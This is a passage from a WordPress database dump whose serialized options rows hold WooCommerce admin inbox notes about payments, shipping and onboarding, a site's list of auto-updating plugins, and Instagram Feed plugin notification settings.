more\";}}s:3:\"url\";s:84:\"https://docs.woocommerce.com/document/woocommerce-shipping-and-tax/?utm_source=inbox\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:20:\"woocommerce-services\";}}i:1;O:8:\"stdClass\":3:{s:4:\"type\";s:18:\"wcadmin_active_for\";s:9:\"operation\";s:1:\"<\";s:4:\"days\";i:2;}}}s:32:\"ecomm-unique-shopping-experience\";O:8:\"stdClass\":8:{s:4:\"slug\";s:32:\"ecomm-unique-shopping-experience\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:53:\"For a shopping experience as unique as your customers\";s:7:\"content\";s:274:\"Product Add-Ons allow your customers to personalize products while they’re shopping on your online store. No more follow-up email requests—customers get what they want, before they’re done checking out. Learn more about this extension that comes included in your plan.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:43:\"learn-more-ecomm-unique-shopping-experience\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:71:\"https://docs.woocommerce.com/document/product-add-ons/?utm_source=inbox\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:3:{i:0;s:35:\"woocommerce-shipping-australia-post\";i:1;s:32:\"woocommerce-shipping-canada-post\";i:2;s:30:\"woocommerce-shipping-royalmail\";}}i:1;O:8:\"stdClass\":3:{s:4:\"type\";s:18:\"wcadmin_active_for\";s:9:\"operation\";s:1:\"<\";s:4:\"days\";i:2;}}}s:37:\"wc-admin-getting-started-in-ecommerce\";O:8:\"stdClass\":8:{s:4:\"slug\";s:37:\"wc-admin-getting-started-in-ecommerce\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:38:\"Getting Started in eCommerce - webinar\";s:7:\"content\";s:174:\"We want to make eCommerce and this process of getting started as easy as possible for you. Watch this webinar to get tips on how to have our store up and running in a breeze.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:17:\"watch-the-webinar\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:17:\"Watch the webinar\";}}s:3:\"url\";s:28:\"https://youtu.be/V_2XtCOyZ7o\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:18:\"onboarding_profile\";s:5:\"index\";s:12:\"setup_client\";s:9:\"operation\";s:2:\"!=\";s:5:\"value\";b:1;}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:3:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:18:\"onboarding_profile\";s:5:\"index\";s:13:\"product_count\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:1:\"0\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:18:\"onboarding_profile\";s:5:\"index\";s:7:\"revenue\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:4:\"none\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:18:\"onboarding_profile\";s:5:\"index\";s:7:\"revenue\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:10:\"up-to-2500\";}}}}}s:18:\"your-first-product\";O:8:\"stdClass\":8:{s:4:\"slug\";s:18:\"your-first-product\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:18:\"Your first product\";s:7:\"content\";s:461:\"That\'s huge! You\'re well on your way to building a successful online store — now it’s time to think about how you\'ll fulfill your orders.<br/><br/>Read our shipping guide to learn best practices and options for putting together your shipping strategy. And for WooCommerce stores in the United States, you can print discounted shipping labels via USPS with <a href=\"https://href.li/?https://woocommerce.com/shipping\" target=\"_blank\">WooCommerce Shipping</a>.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:82:\"https://woocommerce.com/posts/ecommerce-shipping-solutions-guide/?utm_source=inbox\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:4:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:12:\"stored_state\";s:5:\"index\";s:22:\"there_were_no_products\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";b:1;}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:12:\"stored_state\";s:5:\"index\";s:22:\"there_are_now_products\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";b:1;}i:2;O:8:\"stdClass\":3:{s:4:\"type\";s:13:\"product_count\";s:9:\"operation\";s:2:\">=\";s:5:\"value\";i:1;}i:3;O:8:\"stdClass\":5:{s:4:\"type\";s:18:\"onboarding_profile\";s:5:\"index\";s:13:\"product_types\";s:9:\"operation\";s:8:\"contains\";s:5:\"value\";s:8:\"physical\";s:7:\"default\";a:0:{}}}}s:31:\"wc-square-apple-pay-boost-sales\";O:8:\"stdClass\":8:{s:4:\"slug\";s:31:\"wc-square-apple-pay-boost-sales\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:26:\"Boost sales with Apple Pay\";s:7:\"content\";s:191:\"Now that you accept Apple Pay® with Square you can increase conversion rates by letting your customers know that Apple Pay® is available. Here’s a marketing guide to help you get started.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:27:\"boost-sales-marketing-guide\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:19:\"See marketing guide\";}}s:3:\"url\";s:97:\"https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=square-boost-sales\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:9:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.8\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:18:\"woocommerce-square\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"2.3\";}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:27:\"wc_square_apple_pay_enabled\";s:5:\"value\";i:1;s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:38:\"wc-square-apple-pay-grow-your-business\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:4;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:38:\"wc-square-apple-pay-grow-your-business\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}i:5;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:6;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}i:7;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:8;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}}}s:38:\"wc-square-apple-pay-grow-your-business\";O:8:\"stdClass\":8:{s:4:\"slug\";s:38:\"wc-square-apple-pay-grow-your-business\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:45:\"Grow your business with Square and Apple Pay \";s:7:\"content\";s:178:\"Now more than ever, shoppers want a fast, simple, and secure online checkout experience. Increase conversion rates by letting your customers know that you now accept Apple Pay®.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:34:\"grow-your-business-marketing-guide\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:19:\"See marketing guide\";}}s:3:\"url\";s:104:\"https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=square-grow-your-business\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:9:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.8\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:18:\"woocommerce-square\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"2.3\";}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:27:\"wc_square_apple_pay_enabled\";s:5:\"value\";i:2;s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:31:\"wc-square-apple-pay-boost-sales\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:4;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:31:\"wc-square-apple-pay-boost-sales\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}i:5;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:6;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}i:7;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:8;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}}}s:32:\"wcpay-apple-pay-is-now-available\";O:8:\"stdClass\":8:{s:4:\"slug\";s:32:\"wcpay-apple-pay-is-now-available\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:53:\"Apple Pay is now available with WooCommerce Payments!\";s:7:\"content\";s:397:\"Increase your conversion rate by offering a fast and secure checkout with <a href=\"https://woocommerce.com/apple-pay/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_applepay\" target=\"_blank\">Apple Pay</a>®. It’s free to get started with <a href=\"https://woocommerce.com/payments/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_applepay\" target=\"_blank\">WooCommerce Payments</a>.\";}}s:7:\"actions\";a:2:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:13:\"add-apple-pay\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:13:\"Add Apple Pay\";}}s:3:\"url\";s:69:\"/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}i:1;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:121:\"https://docs.woocommerce.com/document/payments/apple-pay/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_applepay\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:4:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.8\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:20:\"woocommerce-payments\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:5:\"2.2.0\";}i:2;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:5:\"value\";s:2:\"US\";s:9:\"operation\";s:1:\"=\";}i:3;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:26:\"wcpay_is_apple_pay_enabled\";s:5:\"value\";b:0;s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}}}s:27:\"wcpay-apple-pay-boost-sales\";O:8:\"stdClass\":8:{s:4:\"slug\";s:27:\"wcpay-apple-pay-boost-sales\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:26:\"Boost sales with Apple Pay\";s:7:\"content\";s:205:\"Now that you accept Apple Pay® with WooCommerce Payments you can increase conversion rates by letting your customers know that Apple Pay® is available. Here’s a marketing guide to help you get started.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:27:\"boost-sales-marketing-guide\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:19:\"See marketing guide\";}}s:3:\"url\";s:96:\"https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=wcpay-boost-sales\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:4:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.8\";}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:26:\"wcpay_is_apple_pay_enabled\";s:5:\"value\";i:1;s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}}}s:34:\"wcpay-apple-pay-grow-your-business\";O:8:\"stdClass\":8:{s:4:\"slug\";s:34:\"wcpay-apple-pay-grow-your-business\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:58:\"Grow your business with WooCommerce Payments and Apple Pay\";s:7:\"content\";s:178:\"Now more than ever, shoppers want a fast, simple, and secure online checkout experience. Increase conversion rates by letting your customers know that you now accept Apple Pay®.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:34:\"grow-your-business-marketing-guide\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:19:\"See marketing guide\";}}s:3:\"url\";s:103:\"https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=wcpay-grow-your-business\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:4:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.8\";}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:26:\"wcpay_is_apple_pay_enabled\";s:5:\"value\";i:2;s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}}}s:37:\"wc-admin-optimizing-the-checkout-flow\";O:8:\"stdClass\":8:{s:4:\"slug\";s:37:\"wc-admin-optimizing-the-checkout-flow\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:28:\"Optimizing the checkout flow\";s:7:\"content\";s:171:\"It\'s crucial to get your store\'s checkout as smooth as possible to avoid losing sales. Let\'s take a look at how you can optimize the checkout experience for your shoppers.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:28:\"optimizing-the-checkout-flow\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:78:\"https://woocommerce.com/posts/optimizing-woocommerce-checkout?utm_source=inbox\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":3:{s:4:\"type\";s:18:\"wcadmin_active_for\";s:9:\"operation\";s:1:\">\";s:4:\"days\";i:3;}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:45:\"woocommerce_task_list_tracked_completed_tasks\";s:9:\"operation\";s:8:\"contains\";s:5:\"value\";s:8:\"payments\";s:7:\"default\";a:0:{}}}}s:39:\"wc-admin-first-five-things-to-customize\";O:8:\"stdClass\":8:{s:4:\"slug\";s:39:\"wc-admin-first-five-things-to-customize\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:45:\"The first 5 things to customize in your store\";s:7:\"content\";s:173:\"Deciding what to start with first is tricky. To help you properly prioritize, we\'ve put together this short list of the first few things you should customize in WooCommerce.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:82:\"https://woocommerce.com/posts/first-things-customize-woocommerce/?utm_source=inbox\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":3:{s:4:\"type\";s:18:\"wcadmin_active_for\";s:9:\"operation\";s:1:\">\";s:4:\"days\";i:2;}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:45:\"woocommerce_task_list_tracked_completed_tasks\";s:5:\"value\";s:9:\"NOT EMPTY\";s:7:\"default\";s:9:\"NOT EMPTY\";s:9:\"operation\";s:2:\"!=\";}}}s:32:\"wc-payments-qualitative-feedback\";O:8:\"stdClass\":8:{s:4:\"slug\";s:32:\"wc-payments-qualitative-feedback\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:55:\"WooCommerce Payments setup - let us know what you think\";s:7:\"content\";s:146:\"Congrats on enabling WooCommerce Payments for your store. Please share your feedback in this 2 minute survey to help us improve the setup process.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:35:\"qualitative-feedback-from-new-users\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:14:\"Share feedback\";}}s:3:\"url\";s:39:\"https://automattic.survey.fm/wc-pay-new\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:1:{i:0;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:45:\"woocommerce_task_list_tracked_completed_tasks\";s:9:\"operation\";s:8:\"contains\";s:5:\"value\";s:20:\"woocommerce-payments\";s:7:\"default\";a:0:{}}}}}','yes'),(256788,'auto_update_plugins','a:33:{i:0;s:19:\"akismet/akismet.php\";i:1;s:53:\"child-theme-configurator/child-theme-configurator.php\";i:2;s:41:\"child-theme-wizard/child-theme-wizard.php\";i:3;s:33:\"classic-editor/classic-editor.php\";i:4;s:39:\"column-shortcodes/column-shortcodes.php\";i:5;s:36:\"contact-form-7/wp-contact-form-7.php\";i:6;s:59:\"content-views-query-and-display-post-page/content-views.php\";i:7;s:55:\"iubenda-cookie-law-solution/iubenda_cookie_solution.php\";i:8;s:59:\"woocommerce-direct-checkout/woocommerce-direct-checkout.php\";i:9;s:9:\"hello.php\";i:10;s:37:\"lightbox-gallery/lightbox-gallery.php\";i:11;s:36:\"mailjet-for-wordpress/wp-mailjet.php\";i:12;s:21:\"mailin/sendinblue.php\";i:13;s:23:\"page-list/page-list.php\";i:14;s:31:\"popup-builder/popup-builder.php\";i:15;s:26:\"post-smtp/postman-smtp.php\";i:16;s:47:\"really-simple-captcha/really-simple-captcha.php\";i:17;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";i:18;s:33:\"instagram-feed/instagram-feed.php\";i:19;s:33:\"sydney-toolbox/sydney-toolbox.php\";i:20;s:27:\"updraftplus/updraftplus.php\";i:21;s:51:\"woo-stickers-by-webline/woo-stickers-by-webline.php\";i:22;s:27:\"woocommerce/woocommerce.php\";i:23;s:79:\"nm-woocommerce-checkout-field-manager/nm-woocommerce-checkout-field-manager.php\";i:24;s:91:\"woocommerce-gateway-paypal-express-checkout/woocommerce-gateway-paypal-express-checkout.php\";i:25;s:65:\"woocommerce-ultimate-gift-card/woocommerce-ultimate-gift-card.php\";i:26;s:35:\"wp-fastest-cache/wpFastestCache.php\";i:27;s:29:\"wp-mail-bank/wp-mail-bank.php\";i:28;s:24:\"wordpress-seo/wp-seo.php\";i:29;s:25:\"wpseo-video/video-seo.php\";i:30;s:25:\"wpseo-local/local-seo.php\";i:31;s:39:\"wpseo-woocommerce/wpseo-woocommerce.php\";i:32;s:25:\"wpseo-news/wpseo-news.php\";}','no'),(259108,'sbi_notifications','a:4:{s:6:\"update\";i:1612106583;s:4:\"feed\";a:0:{}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','yes'),(259109,'sbi_newuser_notifications','a:4:{s:6:\"update\";i:1603520874;s:4:\"feed\";a:2:{s:6:\"review\";a:6:{s:5:\"title\";s:22:\"Could you help us out?\";s:7:\"content\";s:273:\"It\'s great to see that you\'ve been using the <strong><span>{plugin}</span></strong> plugin for a while now. Hopefully you\'re happy with it!&nbsp; If so, would you consider leaving a positive review? It really helps to support the plugin and helps others to discover it too!\";s:2:\"id\";s:6:\"review\";s:5:\"image\";s:12:\"sbi-icon.png\";s:4:\"btns\";a:4:{s:7:\"primary\";a:4:{s:3:\"url\";s:12:\"{review-url}\";s:4:\"attr\";a:1:{i:0;s:11:\"targetblank\";}s:5:\"class\";s:31:\"sbi_notice_dismiss sbi_main_cta\";s:4:\"text\";s:18:\"Sure, I\'d love to!\";}s:7:\"dismiss\";a:3:{s:3:\"url\";a:1:{s:28:\"sbi_ignore_rating_notice_nag\";s:1:\"1\";}s:5:\"class\";s:18:\"sbi_notice_dismiss\";s:4:\"text\";s:9:\"No thanks\";}s:8:\"complete\";a:3:{s:3:\"url\";a:1:{s:28:\"sbi_ignore_rating_notice_nag\";s:1:\"1\";}s:5:\"class\";s:18:\"sbi_notice_dismiss\";s:4:\"text\";s:27:\"I\'ve already given a review\";}s:5:\"later\";a:3:{s:3:\"url\";a:1:{s:28:\"sbi_ignore_rating_notice_nag\";s:5:\"later\";}s:5:\"class\";s:18:\"sbi_notice_dismiss\";s:4:\"text\";s:12:\"Ask Me Later\";}}s:4:\"wait\";s:2:\"14\";}s:8:\"discount\";a:8:{s:5:\"title\";s:28:\"Attention {platform} Lovers!\";s:7:\"content\";s:221:\"<strong><span>Exclusive offer!</span></strong> We don\'t run promotions very often, but for a limited time we\'re offering <strong><span>{amount} off</span></strong> our Pro version to all users of our free {plugin} plugin.\";s:2:\"id\";s:8:\"discount\";s:6:\"amount\";s:3:\"60%\";s:5:\"image\";s:12:\"sbi-icon.png\";s:13:\"image_overlay\";s:7:\"60% off\";s:4:\"btns\";a:2:{s:7:\"primary\";a:4:{s:3:\"url\";s:127:\"https://smashballoon.com/{slug}/?utm_campaign={campaign}&utm_source=notices&utm_medium=newuser&discount={lowerplatform}thankyou\";s:5:\"class\";s:32:\"sbi_notice_dismiss sbi_offer_btn\";s:4:\"text\";s:14:\"Get this offer\";s:4:\"attr\";a:1:{i:0;s:11:\"targetblank\";}}s:7:\"dismiss\";a:3:{s:3:\"url\";a:1:{s:31:\"sbi_ignore_new_user_sale_notice\";s:6:\"always\";}s:5:\"class\";s:18:\"sbi_notice_dismiss\";s:4:\"text\";s:18:\"I\'m not 